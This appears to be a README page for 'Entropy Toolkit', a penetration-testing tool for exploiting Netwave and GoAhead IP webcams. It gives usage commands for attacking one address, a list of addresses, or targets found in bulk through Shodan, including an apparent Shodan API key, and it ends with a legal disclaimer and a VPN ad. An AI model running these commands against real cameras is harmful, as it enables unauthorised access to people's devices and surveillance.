About Entropy Toolkit
Entropy Toolkit is:
- A set of tools to exploit Netwave and GoAhead IP Webcams.
- A powerful toolkit for webcams penetration testing.
Entropy Toolkit's installationEntropy Toolkit's execution
Entropy Toolkit's examples:
- Example of exploiting a single webcam
entropy -b 1 -i [webcam's ip address and port] -v
entropy -b 1 -i 192.168.1.100:80 -v
- Example of exploiting webcams from a list
entropy -b 2 -l [file text] -v
entropy -b 2 -l iplist.txt -v
- Example of exploiting webcams using shodan
entropy -b 2 -v --shodan [you shodan api key]
entropy -b 2 -v --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
Entropy Toolkit disclaimer:
Usage of the Entropy Toolkit for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
Entropy Toolkit license: MIT license.
(Sign up Windscribe for free, get full protection and stay anonymous
with the best free VPN. Read more here)